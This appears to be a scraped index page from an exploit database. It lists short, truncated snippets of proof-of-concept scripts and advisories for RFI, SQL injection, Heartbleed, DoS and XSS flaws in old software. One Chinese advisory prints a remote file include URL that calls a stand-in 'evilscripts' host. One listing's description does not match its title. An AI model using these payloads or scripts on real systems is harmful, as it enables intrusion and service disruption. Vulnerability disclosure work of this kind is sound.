RedBlog 0.5 Index.PHP Remote File Include Vulnerability

RedBlog 0.5 Index.PHP 远程文件包含漏洞 漏洞类型： 输入验证错误 漏洞危害： 攻击者可以利用该漏洞执行远程php文件，从而攻击RedBlog甚至控制 服务器 exp： http://www.example.com/Path/index.php?rootpath==http://evilscripts? 解决方案： 厂商没有提供补丁，推荐使用加速乐: !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from...

McNews 1.x Install.PHP Arbitrary File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class McNewsRemoteFileIncludePOCBase: vulID = '78899' version = '1' vulDate = '2005-03-17' author = ' '...

NIBE heat pump LFI exploit

No description provided by source. !/usr/bin/python import socket,sys,os,base64 NIBE heat pump LFI exploit Written by Jelmer de Hen Published at http://h.ackack.net/?p=302 Special thanks to Fredrik Nordberg Almroth and Mathias Karlsson for obtaining this information http://h.ackack.net/?p=274 whi...

Quick Player 1.3 Unicode SEH Exploit

No description provided by source. Quick Player 1.3 Unicode SEH Exploit Author Abhishek Lyall and Puneet Jain [email protected] , abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Download Vulnerable...

JAKCMS <= 2.01 RC1 - Blind SQL Injection Exploit

No description provided by source. !/usr/bin/python jakCMS = v2.01 RC1 Blind SQL Injection Exploit Understanding: The parameters 'JAKCOOKIENAME' and 'JAKCOOKIEPASS' are parsed via cookies to the application and are unchecked for malicious characters. The contents of these variables are directly...

SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit

No description provided by source. !/usr/bin/env python SPIP - Content Management System 2.0.9 exploit http://www.securityfocus.com/bid/36008 Author : KernelPanik import urllib, urllib2 import cookielib import sys def sendrequesturlOpener, url, postdata=None: request = urllib2.Requesturl url =...

Insky CMS 006-0111 - Multiple Remote File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class InskyCMSRemoteFileIncludePOCBase: vulID = '68005' version = '1' vulDate = '2006-06-25' author = ' '...

Firefly Media Server <= 0.2.4 - Remote Denial of Service Exploit

No description provided by source. !C:\python25\python25.exe Advisory : UPH-07-02 mt-dappd/Firefly media server remote DoS Discovered by nnp http://www.unprotectedhex.com import sys import socket import time if lensys.argv != 3: sys.exit-1 killmsg = GET /xml-rpc?method=stats HTTP/1.1\r\n...

Core FTP Server Version 1.2, build 535, 32-bit - Crash Poc

D-Link DIR-652, DIR-835, DIR-855L, DGL-500, and DHP-1565 suffer from clear text storage of passwords, cross site scripting, and sensitive information disclosure vulnerabilities. !/usr/bin/python import socket,sys,time def Usage: print "Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C....

enip-info NSE Script

This NSE script is used to send a EtherNet/IP packet to a remote device that has TCP 44818 open. The script will send a Request Identity Packet and once a response is received, it validates that it was a proper response to the command that was sent, and then will parse out the data. Information...

Than imagined more terror! OpenSSL“effort”vulnerability in-depth analysis-vulnerability warning-the black bar safety net

Author: yaoxi original source http://blog.wangzhan.360.cn/ Recently, OpenSSL broke this year's most serious security vulnerability in the hacker community is named“heart bleed”vulnerability. 3 6 0 site Guard security team of the vulnerability analysis, the vulnerability is not only related to htt...

Exploit for Out-of-bounds Read in Openssl

HeartBleed Tester & Exploit --------------------------- NB Ne...

TLS Heartbeat Proof Of Concept

!/usr/bin/env python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. Modified by Csaba Fitzl for multiple SSL / TLS version support import sys import struct import socket import time import select import ...

Heartbleed Proof Of Concept

!/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options =...

OpenSSL TLS Heartbeat Extension - &#039;Heartbleed&#039; Memory Disclosure

!/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options =...

GOM Video Converter 1.1.0.60 Memory Corruption

!/usr/bin/python + Author: TUNISIAN CYBER + Exploit Title: GOM Video Converter 1.1.0.60 Memory Corruption PoC + Date: 22-03-2014 + Category: DoS/PoC + Tested on: WinXp/Windows 7 Pro + Vendor: http://converter.gomlab.com/ + Friendly Sites: na3il.com,th3-creative.com + Twitter: @TCYB3R print"" prin...

ET - Chat Password Reset Security Bypass

ET - Chat Password Reset Security Bypass source: https://www.securityfocus.com/bid/66149/info ET - Chat is prone to a security bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further...

Cisco released Security advisory for critical Router password reset vulnerability

In the first week of this year, we have reported about a critical vulnerability found in more than 2000 Routers that allow attackers to reset the admin panel password to defaults. Recently, Cisco has released a security advisory, detailed about the similar vulnerability affecting their three...

XSS when attaching a file to an issue

Hi, I found a persistent XSS vulnerability when attaching a file to an issue. The steps to reproduce are the following : - Attach a file to an issue. Its name must contain "alert'XSS'". I used a python script to do that. - Browse to the issue and open the ALL tab under activity. A popup should...

TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router - HTTP Denial of Service

Exploit title: 150M Wireless Lite N Router HTTP DoS Date: 28.11.2013 Exploit Author: Dino Causevic Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N Vendor Homepage: http://www.tp-link.com/ Contact: dincaus packetstormsecurity.com CVE: Firmware Version: 3.12.11 Build 1203...